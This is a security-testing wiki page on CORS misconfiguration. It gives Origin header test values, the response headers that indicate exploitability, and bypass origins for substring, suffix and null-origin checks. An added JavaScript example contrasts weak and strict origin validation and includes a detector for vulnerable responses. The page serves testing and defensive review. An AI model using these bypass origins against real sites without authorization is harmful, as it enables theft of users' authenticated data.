====== CORS Misconfiguration ======

Misconfigured CORS allows attacker-controlled sites to make credentialed requests to the target.

===== Testing =====

Add an ''Origin'' header to every interesting request:

<code>
Origin: https://attacker.com
Origin: https://anythinghere-target.com
Origin: null
</code>

Check the response for:

<code>
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true
</code>

Both headers together = exploitable.

===== Bypass Techniques =====

  * **Substring match** -- if they check ''if (strpos($origin, "target.com"))'', try ''https://attacker.com?x=target.com''
  * **Suffix match** -- try ''https://attackertarget.com''
  * **null origin** -- some sites allow ''null'' origin (sandbox iframes)
  * **Subdomain** -- find any XSS on any subdomain of the target; use it as the origin

===== PoC =====

===== Why It Matters =====

Even if an endpoint with CORS misconfiguration seems harmless, the same configuration pattern is often reused across the app. A read on a harmless endpoint proves the bypass -- then look for it on sensitive API calls.

===== See Also =====

  * [[zseano:xss|XSS Testing]]
  * [[tbhm:04_authorization|TBHM Auth & Session]]
  * [[zseano:start|Methodology Index]]
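The following is an added example, not code from the original wiki page. It models the three origin checks listed under "Bypass Techniques" (substring, suffix, null-tolerant) next to a strict allowlist check, and encodes the "both headers together" rule from the "Testing" section as a function a reviewer can run over captured response headers. The allowlist, the sample origins and the function names are constructed for illustration and are not part of any real target.

```javascript
// Added example (not from the wiki page): weak vs. strict Origin validation,
// plus the "ACAO echoes attacker origin AND ACAC: true" response check.
// ALLOWLIST and SAMPLE_ORIGINS are constructed sample values.

// Constructed allowlist of full origins (scheme + host [+ port]), no wildcards.
const ALLOWLIST = new Set(["https://target.com", "https://app.target.com"]);

// Weak check 1: substring match, like strpos($origin, "target.com").
function substringCheck(origin) {
  return origin.includes("target.com");
}

// Weak check 2: suffix match, intended to cover subdomains.
function suffixCheck(origin) {
  return origin.endsWith("target.com");
}

// Weak check 3: exact allowlist, but the "null" origin is also accepted.
function nullTolerantCheck(origin) {
  return origin === "null" || ALLOWLIST.has(origin);
}

// Strict check: the header must parse as a URL whose serialized origin is
// byte-for-byte the header value, and that origin must be in the allowlist.
function strictCheck(origin) {
  if (typeof origin !== "string" || origin === "null") return false;
  let parsed;
  try {
    parsed = new URL(origin);
  } catch {
    return false; // not a URL at all
  }
  // A browser-sent Origin is a serialized origin: no path, query or fragment.
  // "https://attacker.com?x=target.com" fails here because its origin differs.
  if (parsed.origin !== origin) return false;
  return ALLOWLIST.has(origin);
}

// Runs every check against one origin so the differences are visible.
function evaluateOrigin(origin) {
  return {
    origin,
    substring: substringCheck(origin),
    suffix: suffixCheck(origin),
    nullTolerant: nullTolerantCheck(origin),
    strict: strictCheck(origin),
  };
}

// Headers a server would emit if it trusted `origin` under a given check.
// Reflecting the origin together with credentials is the dangerous pattern.
function corsHeadersFor(origin, check) {
  if (!check(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// The "Testing" rule: ACAO equals the supplied origin AND ACAC is "true".
// Header names are matched case-insensitively. A literal "*" combined with
// credentials is refused by browsers, so it is not counted as exploitable.
function isExploitableResponse(headers, origin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v).trim();
  const acao = h["access-control-allow-origin"];
  const acac = h["access-control-allow-credentials"];
  return acao !== undefined && acao !== "*" && acao === origin && acac === "true";
}

// Constructed sample origins: two legitimate, one per bypass technique.
const SAMPLE_ORIGINS = [
  "https://target.com",
  "https://app.target.com",
  "https://attacker.com?x=target.com", // substring bypass
  "https://attackertarget.com",        // suffix bypass
  "null",                              // sandboxed-iframe origin
];

console.table(SAMPLE_ORIGINS.map(evaluateOrigin));
```

Only ''strictCheck'' rejects all three bypass origins while still accepting the two allowlisted ones; the table printed at the end makes the difference visible per origin. ''isExploitableResponse'' is the same rule a tester applies by eye under "Testing", expressed so it can be run over a batch of captured responses.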